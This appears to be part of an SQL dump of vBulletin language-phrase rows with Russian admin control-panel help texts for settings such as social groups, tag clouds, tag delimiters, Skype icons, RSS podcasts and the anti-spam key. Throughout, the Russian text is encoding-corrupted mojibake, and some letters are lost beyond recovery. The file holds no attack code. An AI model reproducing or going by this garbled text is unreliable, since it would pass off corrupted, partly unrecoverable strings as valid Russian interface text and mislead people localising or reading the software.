(22934, -1, 'options_options_sg_name_maxchars_text', 'cphelptext', 'Óêà æèòå çäåñü ìà êñèìà ëüÃî äîïóñòèìîå êîëè÷åñòâî ñèìâîëîâ â Ãà çâà Ãèè ñîöèà ëüÃîé ãðóïïû, ñîçäà âà åìîé ó÷à ñòÃèêîì ôîðóìà . \r\n \r\nÅñëè ïîëüçîâà òåëü óêà æåò Ãà çâà Ãèå ãðóïïû, ñîäåðæà ùåå êîëè÷åñòâî ñèìâîëîâ áîëüøå óêà çà ÃÃîãî çäåñü, òî åìó áóäåò îòîáðà æåÃî ñîîáùåÃèå îá îøèáêå, ñ ïðåäëîæåÃèåì ñîêðà òèòü Ãà çâà Ãèå.', 'vbulletin', 'zCarot', 1205423033, '3.7.0 Release Candidate 1'),
(22935, -1, 'options_options_sg_name_maxchars_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà Ãà çâà Ãèÿ ñîöèà ëüÃîé ãðóïïû', 'vbulletin', 'zCarot', 1205423033, '3.7.0 Release Candidate 1'),
(22936, -1, 'options_options_sg_newgroups_count_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì óêà çà òü êîëè÷åñòâî ãðóïï, îòîáðà æà åìûõ â ðà çäåëå Ãîâûå ãðóïïû îáçîðà ñîöèà ëüÃûõ ãðóïï. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218111541, '3.8.0 Alpha 1'),
(22937, -1, 'options_options_sg_newgroups_count_title', 'cphelptext', 'Îòîáðà æà åìîå êîëè÷åñòâî Ãîâûõ ãðóïï', 'vbulletin', 'zCarot', 1218111541, '3.8.0 Alpha 1'),
(22938, -1, 'options_options_sg_perpage_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì óêà çà òü êîëè÷åñòâî ñîöèà ëüÃûõ ãðóïï, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå, ïî óìîë÷à Ãèþ. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå 0.', 'vbulletin', 'zCarot', 1218113717, '3.8.0 Alpha 1'),
(22939, -1, 'options_options_sg_perpage_title', 'cphelptext', 'Êîëè÷åñòâî ãðóïï Ãà ñòðà Ãèöó ïî óìîë÷à Ãèþ', 'vbulletin', 'zCarot', 1218113717, '3.8.0 Alpha 1'),
(22940, -1, 'options_options_skypeweb_gfx_text', 'cphelptext', 'Åñòü òðè âà ðèà Ãòà äëÿ ýòîé îïöèè. Åñëè \"Ãåò \", òî èêîÃêà Skype™ (èñïîëüçóåòñÿ â øà áëîÃÃ¥ im_skype ) áóäåò çà ãðóæà òüñÿ ñ âà øåãî ñåðâåðà . Ãòî ïîëåçÃî, åñëè ñåðâåð SkypeWeb â äà ÃÃûé ìîìåÃò Ãåäîñòóïåà èëè äîëãî îòâå÷à åò. \r\n \r\nÅñëè \"Äà \", òî èêîÃêà áóäåò çà ãðóæà òüñÿ ñ ñåðâåðà SkypeWeb, è ïîëüçîâà òåëè ñìîãóò âèäåòü îÃëà éà ñòà òóñ Skype™. \r\n \r\nÄîïîëÃèòåëüÃî, SkypeWeb äà ¸ò âîçìîæÃîñòü îòîáðà æà òü îÃëà éà ñòà òóñ Ãà ÃÃ¥ à Ããëèéñêèõ ÿçûêà õ. Ãòî ìîæåò èñïîëüçîâà òüñÿ Ãà ñòðà Ãèöå \"Îòïðà âèòü ñîîáùåÃèå ïîëüçîâà òåëþ ÷åðåç Skype\", ÷òîáû âñå ìîãëè óçÃà òü, èñïîëüçóåò ëè äà ÃÃûé ïîëüçîâà òåëü Skype â äà ÃÃûé ìîìåÃò, ÷òîáû ïîãîâîðèòü ñ Ãèì. \r\n \r\nÃî èäåå, ÷òîáû ðà áîòà ë âòîðîé âà ðèà Ãò, âû äîëæÃû âêëþ÷èòü ïà ðà ìåòð \"Èñïîëüçîâà òü ãðà ôèêó SkypeWeb, çà âèñÿùóþ îò ÿçûêà \" è óñòà Ãîâèòü êîä ÿçûêà ôîðóìà , êîòîðûé äîëæåà áûòü îäÃèì èç ñëåäóþùèõ:\r\n\r\n En \r\n De \r\n fr \r\n it \r\n pl \r\n Ja \r\n Pt \r\n Pt/br \r\n Se \r\n zh \r\n Cn \r\n Zh/cn \r\n hk \r\n tw \r\n Zh/tw \r\n \r\nÃŽÃè ÃÃ¥ çà âèñÿò îò ðåãèñòðà , è âû ìîæåòå èñïîëüçîâà òü òèðå âìåñòî ñëåøà , åñëè ïîæåëà åòå (pt-br âìåñòî Pt/br ).', 'vbulletin', 'zCarot', 1180532130, '3.6.8'),
(22941, -1, 'options_options_skypeweb_gfx_title', 'cphelptext', 'Èñïîëüçîâà òü ãðà ôèêó SkypeWeb', 'vbulletin', '', 0, ''),
(22942, -1, 'options_options_socialbookmarks_text', 'cphelptext', 'Ãòî ãëîáà ëüÃûé âûêëþ÷à òåëü ñîöèà ëüÃûõ çà êëà äîê. Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî ññûëêè Ãà ñà éòû ñîöèà ëüÃûõ çà êëà äîê ÃÃ¥ áóäóò îòîáðà æà òüñÿ âÃèçó êà æäîé òåìû, âÃÃ¥ çà âèñèìîñòè îò Ãà ñòðîåê â óïðà âëåÃèè ñîöèà ëüÃûìè çà êëà äêà ìè . \r\n \r\nÅñëè ññûëêè Ãà ñîöèà ëüÃûå çà êëà äêè ÃÃ¥ îòîáðà æà þòñÿ â òåìà õ, òî âà ì ñëåäóåò ïðîâåðèòü, ìîãóò ëè ãîñòè ïðîñìà òðèâà òü ýòó òåìó. Ññûëêè áóäóò îòîáðà æà òüñÿ òîëüêî â òåõ òåìà õ, êîòîðûå ìîãóò ïðîñìà òðèâà òü ãîñòè ôîðóìà .', 'vbulletin', 'zCarot', 1205756354, '3.7.0 Release Candidate 1'),
(22943, -1, 'options_options_socialbookmarks_title', 'cphelptext', 'Âêëþ÷èòü ñîöèà ëüÃûå çà êëà äêè', 'vbulletin', 'zCarot', 1193064512, '3.7.0 Beta 1'),
(22944, -1, 'options_options_socnet_text', 'cphelptext', 'Äà ÃÃûå îïöèè ÿâëÿþòñÿ âûêëþ÷à òåëÿìè ðà çÃîîáðà çÃûõ ôóÃêöèé, êîòîðûå ìîãóò áûòü âêëþ÷åÃû â ïðîôèëå ïîëüçîâà òåëåé: \r\n\r\nÑîöèà ëüÃûå ãðóïïû \r\nÂêëþ÷à åò è âûêëþ÷à åò ôóÃêöèþ \"Ñîöèà ëüÃûå ãðóïïû\" \r\nÀëüáîìû \r\nÂêëþ÷à åò è âûêëþ÷à åò ôóÃêöèþ \"Àëüáîìû ïîëüçîâà òåëÿ\" \r\nÄðóçüÿ \r\nÂêëþ÷à åò è âûêëþ÷à åò ôóÃêöèþ \"Äðóçüÿ\" (ÃÃ¥ îòêëþ÷à åò âîçìîæÃîñòü ñîñòà âëåÃèÿ ñïèñêîâ çÃà êîìûõ è èãÃîðèðîâà Ãèÿ) \r\nÇà ïèñü ïîñåòèòåëåé \r\nÂêëþ÷à åò è âûêëþ÷à åò ôóÃêöèþ çà ïèñè ïîñåòèòåëåé ïðîôèëÿ ïîëüçîâà òåëÿ \r\nÃóáëè÷Ãûå cîîáùåÃèÿ \r\nÎòêëþ÷à åò âîçìîæÃîñòü ðà çìåùåÃèÿ ïóáëè÷Ãûõ ñîîáùåÃèé â ïðîôèëå ïîëüçîâà òåëåé \r\n ', 'vbulletin', 'zCarot', 1197373111, '3.7.0 Beta 1'),
(22945, -1, 'options_options_socnet_title', 'cphelptext', 'ÔóÃêöèè ïðîôèëÿ ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1195731436, '3.7.0 Beta 1'),
(22946, -1, 'options_options_tagbadwords_text', 'cphelptext', 'Ãðè ñîçäà Ãèè Ãîâûõ ìåòîê òåì îÃè ïðîâåðÿþòñÿ Ãà ñîîòâåòñòâèå ñïèñêó, óêà çà ÃÃîìó â includes/searchwords.php, à òà êæå Ãà ñîîòâåòñòâèå ñïèñêó, óêà çà ÃÃîìó â ýòîì ïà ðà ìåòðå. \r\n \r\nÅñëè ñëîâî, âûáðà ÃÃîå ïîëüçîâà òåëåì â êà ÷åñòâå ìåòêè, Ãà éäåÃî â êà êîì-ëèáî èç ýòèõ ñïèñêîâ, òî ïîëüçîâà òåëþ áóäåò âûâåäåÃî ñîîáùåÃèå î òîì, ÷òî îà ÃÃ¥ ìîæåò èñïîëüçîâà òü åãî â êà ÷åñòâå ìåòêè òåìû.', 'vbulletin', 'zCarot', 1211890284, '3.7.1'),
(22947, -1, 'options_options_tagbadwords_title', 'cphelptext', 'Çà ïðåù¸ÃÃûå ñëîâà â ìåòêà õ òåì', 'vbulletin', 'zCarot', 1211890284, '3.7.1'),
(22948, -1, 'options_options_tagcloud_cachetime_text', 'cphelptext', 'Âðåìÿ (â ìèÃóòà õ), â òå÷åÃèå êîòîðîãî äà ÃÃûå îáëà êà ìåòîê áóäóò õðà Ãèòüñÿ â êýøå. Óêà æèòå çäåñü \"0\", ÷òîáû îòêëþ÷èòü êýøèðîâà Ãèå.', 'vbulletin', 'zCarot', 1193069116, '3.7.0 Beta 1'),
(22949, -1, 'options_options_tagcloud_cachetime_title', 'cphelptext', 'Âðåìÿ õðà ÃÃ¥Ãèÿ îáëà êà ìåòîê â êýøå', 'vbulletin', 'zCarot', 1206528572, '3.7.0 Release Candidate 2'),
(22950, -1, 'options_options_tagcloud_levels_text', 'cphelptext', 'Êîëè÷åñòâî ðà çìåðîâ äëÿ îòîáðà æåÃèÿ ìåòîê â îáëà êå. \r\n \r\nÅñëè âû æåëà åòå óêà çà òü çÃà ÷åÃèå áîëüøå 5, òî âà ì ñëåäóåò îòðåäà êòèðîâà òü øà áëîà search_forums, äîáà âèâ â Ãåãî äîïîëÃèòåëüÃûå ïðà âèëà CSS.', 'vbulletin', 'zCarot', 1193068827, '3.7.0 Beta 1'),
(22951, -1, 'options_options_tagcloud_levels_title', 'cphelptext', 'Êîëè÷åñòâî \'ÓðîâÃåé\' â îáëà êå ìåòîê', 'vbulletin', 'zCarot', 1206528565, '3.7.0 Release Candidate 2'),
(22952, -1, 'options_options_tagcloud_searchcloud_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî âÃèçó ñòðà Ãèöû ðà ñøèðåÃÃîãî ïîèñêà áóäåò îòîáðà æà òüñÿ îáëà êî ïîèñêà ìåòîê. Ãòî îáëà êî îòëè÷à åòñÿ îò îáû÷Ãîãî òåì, ÷òî îÃî ñòðîèòñÿ èñõîäÿ èç ÷à ñòîòû ïîèñêà òåì ïî îïðåäåë¸ÃÃîé ìåòêå, à ÃÃ¥ èç ÷à ñòîòû èñïîëüçîâà Ãèÿ îïðåäåë¸ÃÃîé ìåòêè â òåìà õ.', 'vbulletin', 'zCarot', 1206528776, '3.7.0 Release Candidate 2'),
(22953, -1, 'options_options_tagcloud_searchcloud_title', 'cphelptext', 'Âêëþ÷èòü îáëà êî ïîèñêà ìåòîê', 'vbulletin', 'zCarot', 1206528776, '3.7.0 Release Candidate 2'),
(22954, -1, 'options_options_tagcloud_searchhistory_text', 'cphelptext', 'Êîëè÷åñòâî äÃåé, â òå÷åÃèå êîòîðûõ áóäóò õðà Ãèòüñÿ äà ÃÃûå äëÿ ñîñòà âëåÃèÿ îáëà êà ïîèñêà ìåòîê. \r\n \r\nÓêà æèòå çäåñü \"0\", ÷òîáû õðà Ãèòü äà ÃÃûå âå÷Ãî.', 'vbulletin', 'zCarot', 1206528207, '3.7.0 Release Candidate 2'),
(22955, -1, 'options_options_tagcloud_searchhistory_title', 'cphelptext', 'Êîëè÷åñòâî äÃåé äëÿ îáëà êà ïîèñêà ìåòîê', 'vbulletin', 'zCarot', 1206528207, '3.7.0 Release Candidate 2'),
(22956, -1, 'options_options_tagcloud_tags_text', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ìåòîê, êîòîðûå áóäóò îòîáðà æà òüñÿ â îáëà êå. Ãîëüøîå êîëè÷åñòâî äà ñò áîëüøå èÃôîðìà òèâÃîñòè, Ãî ïðè ýòîì áóäåò ñëîæÃî Ãà éòè ÃåïîïóëÿðÃóþ ìåòêó.', 'vbulletin', 'zCarot', 1193068902, '3.7.0 Beta 1'),
(22957, -1, 'options_options_tagcloud_tags_title', 'cphelptext', 'Êîëè÷åñòâî ìåòîê â îáëà êå', 'vbulletin', 'zCarot', 1206528555, '3.7.0 Release Candidate 2'),
(22958, -1, 'options_options_tagcloud_usagehistory_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, çà êà êîé ïåðèîä (â äÃÿõ) äåëà òü âûáîðêó äëÿ ñîñòà âëåÃèÿ îáëà êà ìåòîê, îòîáðà æà åìîãî çäåñü . Ìåòêè, äîáà âëåÃÃûå ðà Ãüøå, ÷åì óêà çà ÃÃîå çäåñü êîëè÷åñòâî äÃåé Ãà çà ä, ÃÃ¥ áóäóò âëèÿòü Ãà îáëà êî ìåòîê. \r\n \r\nÎáëà êî ìåòîê ïîçâîëÿåò ëåãêî óçÃà òü ÷òî ïîïóëÿðÃî Ãà âà øåì ñà éòå. Âû ìîæåòå èñïîëüçîâà òü äà ÃÃûé ïà ðà ìåòð, ÷òîáû îòîáðà çèòü â îáëà êå áîëåå à êòóà ëüÃóþ èÃôîðìà öèþ, èñêëþ÷èâ òî, ÷òî áûëî ïîïóëÿðÃî ðà Ãåå, à ñåé÷à ñ çà áûòî.', 'vbulletin', 'zCarot', 1206528934, '3.7.0 Release Candidate 2'),
(22959, -1, 'options_options_tagcloud_usagehistory_title', 'cphelptext', 'Êîëè÷åñòâî äÃåé äëÿ îáëà êà ìåòîê', 'vbulletin', 'zCarot', 1206528934, '3.7.0 Release Candidate 2'),
(22960, -1, 'options_options_tagcloud_usergroup_text', 'cphelptext', 'Âû ìîæåòå ñòðîèòü îáëà êî ìåòîê, èñõîäÿ èç ïðà â ãðóïï ïîëüçîâà òåëåé, ÷òîáû ÃÃ¥ äîáà âëÿòü â îáëà êî ìåòêè, êîòîðûå äîáà âëåÃû â çà êðûòûõ ðà çäåëà õ. Òà êèì îáðà çîì, áóäóò ñ÷èòà òüñÿ òîëüêî òå ìåòêè, êîòîðûå áûëè äîáà âëåÃû ê òåìà ì, êîòîðûå ìîæåò ïðîñìà òðèâà òü äà ÃÃûé ïîëüçîâà òåëü. \r\n \r\nÂûáðà â \"ÃîñòîÿÃÃà ÿ ïðîâåðêà ïðà â\", âû îòêëþ÷èòå êýøèðîâà Ãèå îáëà êà ìåòîê, Ãî ïðà âà áóäóò ñîáëþäåÃû ïîëÃîñòüþ. \r\n \r\nÅñëè âû âûáåðèòå \"Ãåç ïðîâåðêè ïðà â\", òî îáëà êî áóäåò ñòðîèòüñÿ èñõîäÿ èç óòâåðæäåÃèÿ, ÷òî ïîëüçîâà òåëü èìååò ïðà âà äîñòóïà êî âñåì ðà çäåëà ì.', 'vbulletin', 'zCarot', 1209744808, '3.7.1'),
(22961, -1, 'options_options_tagcloud_usergroup_title', 'cphelptext', 'Îáëà êî ìåòîê äëÿ ãðóïï ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1209744808, '3.7.1'),
(22962, -1, 'options_options_tagdelimiter_text', 'cphelptext', 'Âû ìîæåòå óêà çà òü äîïîëÃèòåëüÃûå ðà çäåëèòåëè äëÿ ìåòîê. Ãî óìîë÷à Ãèþ ðà çäåëèòåëåì ÿâëÿåòñÿ çà ïÿòà ÿ, è å¸ Ãåëüçÿ óäà ëèòü èç ñïèñêà ðà çäåëèòåëåé, Ãåçà âèñèìî îò òîãî, ÷òî âû óêà çà ëè çäåñü. \r\n \r\nÌåæäó ðà çäåëèòåëÿìè ïîìåùà éòå ïðîáåëû. Ãà ïðèìåð, \"| &\" áóäåò îçÃà ÷à òü, ÷òî ìåòêè ìîãóò áûòü ðà çäåëåÃû êà ê çà ïÿòîé (,), òà ê è ïà ëêîé (|) è à ìïåðñà Ãäîì (&). Ãðè Ãåîáõîäèìîñòè, ðà çäåëèòåëè ìîãóò ñîñòîÿòü èç Ãåñêîëüêèõ ñèìâîëîâ. \r\n \r\nÅñëè âû æåëà åòå óêà çà òü â êà ÷åñòâå ðà çäåëèòåëÿ ïðîáåë, ëèáî óêà çà òü åãî â êà ÷åñòâå ÷à ñòè ðà çäåëèòåëÿ èç Ãåñêîëüêèõ ñèìâîëîâ, òî âû äîëæÃû ïîìåñòèòü ñèìâîëû ðà çäåëèòåëÿ ìåæäó çÃà êà ìè { è }. Ãà ïðèìåð, ÷òîáû óêà çà òü â êà ÷åñòâå ðà çäåëèòåëÿ çÃà ê ïðîáåëà , âà ì ñëåäóåò èñïîëüçîâà òü \"{ }\". ×òîáû óêà çà òü ïðîáåë â êà ÷åñòâå îäÃîãî èç ñèìâîëîâ ðà çäåëèòåëÿ, âà ì ÃóæÃî óêà çà òü Ãå÷òî âðîäå \"{| |}\"; ýòî áóäåò îçÃà ÷à òü, ÷òî äëÿ ðà çäåëåÃèÿ ìåòîê ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü êîìáèÃà öèþ \"| |\". \r\n \r\nÃîìÃèòå, ÷òî äîáà âèâ ðà çäåëèòåëè, âû ìîæåòå ñäåëà òü ïðåäûäóùèå ìåòêè ÃåâåðÃûìè. Ãà ïðèìåð, åñëè ó âà ñ åñòü ìåòêà \"èÃòåðåñÃûå ôà êòû\", è âû äîáà âèëè ïðîáåë â êà ÷åñòâå ðà çäåëèòåëÿ, òî êîãäà êà êîé-ëèáî ïîëüçîâà òåëü çà õî÷åò äîáà âèòü ýòó ìåòêó, îÃà ñòà Ãåò äâóìÿ: \"èÃòåðåñÃûå\" è \"ôà êòû\". \r\n \r\nÃðè äîáà âëåÃèè ðà çäåëèòåëÿ â ýòîò ñïèñîê, âû, âîçìîæÃî, ïîæåëà åòå èçìåÃèòü ñîäåðæèìîå äâóõ ôðà ç, äîáà âèâ â Ãèõ äîïîëÃèòåëüÃûå ðà çäåëèòåëè:\r\n\r\nseparate_tags_using_comma \r\ntag_no_comma \r\n ', 'vbulletin', 'zCarot', 1211458472, '3.7.1'),
(22963, -1, 'options_options_tagdelimiter_title', 'cphelptext', 'Ãà çäåëèòåëè ìåòîê', 'vbulletin', 'zCarot', 1211458472, '3.7.1'),
(22964, -1, 'options_options_taggoodwords_text', 'cphelptext', 'Ãåðåä ïðîâåðêîé Ãà äëèÃó ìåòêè è Ãà çà ïðåù¸ÃÃûå ñëîâà , ñèñòåìà ïîñìîòðèò, Ãà õîäèòñÿ ëè ìåòêà â ýòîì ñïèñêå. \r\n \r\nÅñëè ìåòêà Ãà éäåÃà â ýòîì ñïèñêå, òî âñå äðóãèå ïðîâåðêè áóäóò ïðîïóùåÃû è ñëîâî áóäåò ðà çðåøåÃî â êà ÷åñòâå ìåòêè, Ãåçà âèñèìî îò äðóãèõ Ãà ñòðîåê.', 'vbulletin', 'zCarot', 1211890401, '3.7.1'),
(22965, -1, 'options_options_taggoodwords_title', 'cphelptext', 'Ãà çðåø¸ÃÃûå ñëîâà â ìåòêà õ òåì', 'vbulletin', 'zCarot', 1211890401, '3.7.1'),
(22966, -1, 'options_options_tagminlen_text', 'cphelptext', 'ÌèÃèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ â Ãà çâà Ãèè ìåòêè. ÌîæÃî óêà çà òü ÷èñëî îò 1 äî 100.', 'vbulletin', 'zCarot', 1198246385, '3.7.0 Beta 4'),
(22967, -1, 'options_options_tagminlen_title', 'cphelptext', 'ÌèÃèìà ëüÃà ÿ äëèÃà ìåòêè', 'vbulletin', 'zCarot', 1198246385, '3.7.0 Beta 4'),
(22968, -1, 'options_options_thumbcolor_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò öâåò ðà ìêè (border) è ìåòêè (label) ìèÃèà òþðû. ÊîððåêòÃûìè çÃà ÷åÃèÿìè áóäóò ëþáûå âà ðèà Ãòû, Ãà ÷èÃà ÿ ñ #000000 (÷¸ðÃûé), çà êà Ã÷èâà ÿ #FFFFFF (áåëûé).', 'vbulletin', 'zCarot', 1149534997, '3.6.0 Beta 1'),
(22969, -1, 'options_options_thumbcolor_title', 'cphelptext', 'Öâåò äëÿ ìèÃèà òþðû', 'vbulletin', 'zCarot', 1149534997, '3.6.0 Beta 1'),
(22970, -1, 'options_options_tosurl_text', 'cphelptext', 'Ââåäèòå ññûëêó Ãà óñëîâèÿ èñïîëüçîâà Ãèÿ âà øåãî ôîðóìà , åñëè îÃè ñóùåñòâóþò. Åñëè æå Ãåò, òî îñòà âüòå ïîëå ïóñòûì.', 'vbulletin', 'zCarot', 1218457621, '3.8.0 Alpha 1'),
(22971, -1, 'options_options_tosurl_title', 'cphelptext', 'Ññûëêà Ãà óñëîâèÿ èñïîëüçîâà Ãèÿ', 'vbulletin', 'zCarot', 1218457621, '3.8.0 Alpha 1'),
(22972, -1, 'options_options_uiforumid_text', 'cphelptext', 'Ñèñòåìà Ãà ðóøåÃèé ïîëüçîâà òåëåé ìîæåò à âòîìà òè÷åñêè ñîçäà âà òü òåìû äëÿ îáñóæäåÃèÿ êà æäîãî Ãà ðóøåÃèÿ.\r\n\r\nÒåìà áóäåò îáÃîâëåÃà , åñëè Ãà ðóøåÃèå èñòå÷¸ò.', 'vbulletin', 'zCarot', 1149630433, '3.6.0 Beta 1'),
(22973, -1, 'options_options_uiforumid_title', 'cphelptext', 'Ãà çäåë äëÿ îáñóæäåÃèÿ Ãà ðóøåÃèé ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22974, -1, 'options_options_uimessage_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè ïîëüçîâà òåëü, âûäà þùèé Ãà ðóøåÃèå áóäåò îáÿçà à îòïðà âèòü ñ ñîîáùåÃèå î øì. Ôîðìà ò ñîîáùåÃèÿ è åãî òèï (ëè÷Ãîå ñîîáùåÃèå èëè ýëåêòðîÃÃîå ïèñüìî) çà âèñèò îò Ãà ñòðîåê âà øåãî ôîðóìà . Åñëè æå ýòà îïöèÿ âûêëþ÷åÃà , òî ó ïîëüçîâà òåëÿ áóäåò âîçìîæÃîñòü ÃÃ¥ îòïðà âëÿòü ñîîáùåÃèå.  ëþáîì ñëó÷à å Ãà ðóøèòåëü áóäåò óâåäîìë¸à î Ãà ðóøåÃèè ÷åðåç ËÑ èëè ïî ýëåêòðîÃÃîé ïî÷òå ñòà Ãäà ðòÃûìè óâåäîìëåÃèÿìè ôîðóìà .', 'vbulletin', 'zCarot', 1149894480, '3.6.0 Beta 2'),
(22975, -1, 'options_options_uimessage_title', 'cphelptext', 'Òðåáîâà òü ñîîáùåÃèå î Ãà ðóøåÃèè', 'vbulletin', 'zCarot', 1149894480, '3.6.0 Beta 2'),
(22976, -1, 'options_options_usercss_allowed_fonts_text', 'cphelptext', 'Ñïèñîê ðà çðåø¸ÃÃûõ øðèôòîâ äëÿ èçìåÃÃ¥Ãèÿ îòîáðà æåÃèÿ ïðîôèëÿ. Ãà çäåëÿéòå øðèôòû ïåðåâîäîì ñòðîêè.', 'vbulletin', 'zCarot', 1195732576, '3.7.0 Beta 1'),
(22977, -1, 'options_options_usercss_allowed_fonts_title', 'cphelptext', 'Ãà çðåø¸ÃÃûå øðèôòû', 'vbulletin', 'zCarot', 1195732576, '3.7.0 Beta 1'),
(22978, -1, 'options_options_usercss_allowed_padding_text', 'cphelptext', 'Ñïèñîê ðà çðåø¸ÃÃûõ îòñòóïîâ äëÿ èçìåÃÃ¥Ãèÿ îòîáðà æåÃèÿ ïðîôèëÿ. Ãà çäåëÿéòå îòñòóïû ïåðåâîäîì ñòðîêè.', 'vbulletin', 'zCarot', 1198246255, '3.7.0 Beta 4'),
(22979, -1, 'options_options_usercss_allowed_padding_title', 'cphelptext', 'Ãà çðåø¸ÃÃûé îòñòóï', 'vbulletin', 'zCarot', 1198246255, '3.7.0 Beta 4'),
(22980, -1, 'options_options_vm_allowed_bbcode_text', 'cphelptext', ' äà ÃÃîé îïöèè, âû ìîæåòå óêà çà òü, êà êèå BB êîäû ìîæÃî áóäåò èñïîëüçîâà òü â ïóáëè÷Ãûõ ñîîáùåÃèÿõ. \r\n \r\nÃî óìîë÷à Ãèþ âêëþ÷åÃû ñëåäóþùèå BB êîäû: îñÃîâÃûå (B, I, U), öâåòà è ññûëîê (URL, EMAIL, THREAD, POST).', 'vbulletin', 'zCarot', 1206966101, '3.7.0 Release Candidate 2'),
(22981, -1, 'options_options_vm_allowed_bbcode_title', 'cphelptext', 'Ãà çðåø¸ÃÃûå BB êîäû äëÿ ïóáëè÷Ãûõ ñîîáùåÃèé', 'vbulletin', 'zCarot', 1205422208, '3.7.0 Release Candidate 1'),
(22982, -1, 'options_options_welcomepm_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ïîñëå ðåãèñòðà öèè ïîëüçîâà òåëþ áóäåò îòïðà âëåÃî ïðèâåòñòâåÃÃîå ëè÷Ãîå ñîîáùåÃèå. ÃîìÃèòå, åñëè âû âêëþ÷èòå ïðîâåðêó à äðåñà ýëåêòðîÃÃîé ïî÷òû ïðè ðåãèñòðà öèè, òî ïðèâåòñòâåÃÃîå ëè÷Ãîå ñîîáùåÃèå áóäåò îòïðà âëåÃî òîëüêî ïîñëå ïîäòâåðæäåÃèÿ à äðåñà ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëåì. Åñëè æå ó âà ñ âêëþ÷åÃà ïðîâåðêà Ãîâûõ ïîëüçîâà òåëåé, òî ëè÷Ãîå ñîîáùåÃèå áóäåò îòïðà âëåÃî, êà ê òîëüêî ïîëüçîâà òåëü áóäåò ïîäòâåðæä¸à îäÃèì èç ìîäåðà òîðîâ.', 'vbulletin', 'zCarot', 1145990990, '3.6.0 Beta 1'),
(22983, -1, 'options_options_welcomepm_title', 'cphelptext', 'ÃðèâåòñòâåÃÃîå ëè÷Ãîå ñîîáùåÃèå', 'vbulletin', 'zCarot', 1145990990, '3.6.0 Beta 1'),
(22984, -1, 'options_options_rsspodcast_text', 'cphelptext', 'RSS âëîæåÃèå - ñïåöèà ëüÃûé êîä, êîòîðûé äîáà âëÿåòñÿ â ëåÃòó RSS2, ïîçâîëÿþùèé ïîäêëþ÷à òü ïåðâîå âëîæåÃèå ñîîáùåÃèÿ â ëåÃòó ÷åðåç \"ïîäêà ñòèÃã\". Ñïåöèôèêà öèÿ ïîääåðæèâà åò òîëüêî îäèà ôà éë äëÿ îäÃîãî ýëåìåÃòà , ïîýòîìó ìîæÃî ïîäêëþ÷à òü ê RSS ëèøü ïåðâîå âëîæåÃèå. ÃŒÃîæåñòâî ïðîãðà ìì äëÿ ïðîñìîòðà RSS ëåÃò, âêëþ÷à ÿ iTunes, ïîçâîëÿþò îáðà áà òûâà òü âëîæåÃèÿ è ñêà ÷èâà òü èõ ïðè ÷òåÃèè ëåÃòû RSS2. Ãåêîòîðûå ïðîãðà ììû ïîÃèìà þò âñå òèïû ôà éëîâ, à äðóãèå - òîëüêî îïðåäåë¸ÃÃûå òèïû. Òà ê, iTunes ïîääåðæèâà åò ëèøü ôà éëû .m4a, .m4v, .mp3, .mp4, .mov è .pdf.  óïðà âëåÃèè ðà çäåëà ìè äëÿ êà æäîãî ðà çäåëà âû ìîæåòå óêà çà òü Ãà ñòðîéêè ïîäêà ñòèÃãà äëÿ iTunes, êîòîðûå ïîäîéäóò è äëÿ äðóãèõ ïðîãðà ìì, ïîääåðæèâà þùèõ RSS âëîæåÃèÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22985, -1, 'options_options_rsspodcast_title', 'cphelptext', 'RSS âëîæåÃèå (ïîäêà ñòèÃã)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22986, -1, 'options_options_socnet_groups_msg_enabled_text', 'cphelptext', 'Åñëè \"Äà \", òî ó÷à ñòÃèêè ãðóïï ñìîãóò ðà çìåùà òü ñîîáùåÃèÿ â ãðóïïå. Ãîëüçîâà òåëè, êîòîðûå ÃÃ¥ ÿâëÿþòñÿ ó÷à ñòÃèêà ìè ãðóïïû, â ëþáîì ñëó÷à å ñìîãóò ïðî÷èòà òü ýòè ñîîáùåÃèÿ.', 'vbulletin', 'zCarot', 1201194465, '3.7.0 Beta 5'),
(22987, -1, 'options_options_socnet_groups_msg_enabled_title', 'cphelptext', 'Âêëþ÷èòü ñîîáùåÃèÿ ãðóïïû', 'vbulletin', 'zCarot', 1199282205, '3.7.0 Beta 4'),
(22988, -1, 'options_options_vb_antispam_key_text', 'cphelptext', 'ÀÃòè-ñïà ì êëþ÷ äëÿ vBulletin îò Akismet èñïîëüçóåòñÿ, ÷òîáû âêëþ÷èòü ñêà Ãèðîâà Ãèå ñîîáùåÃèé ïîëüçîâà òåëåé Ãà ñïà ì ñ ïîìîùüþ âÃåøÃåãî ñåðâèñà . \r\n \r\nÅñëè äà ÃÃûå áóäóò îòìå÷åÃû êà ê ñïà ì, òî îÃè áóäóò à âòîìà òè÷åñêè ïîìåùåÃû Ãà ïðîâåðêó ìîäåðà òîðà ì. Âà ì ñëåäóåò äà òü ñâîèì ìîäåðà òîðà ì ðà çðåøåÃèå \"Ìîæåò ïðîâåðÿòü\", ÷òîáû äà ÃÃà ÿ ôóÃêöèÿ ðà áîòà ëà .', 'vbulletin', 'zCarot', 1221044432, '3.8.0 Alpha 1'),
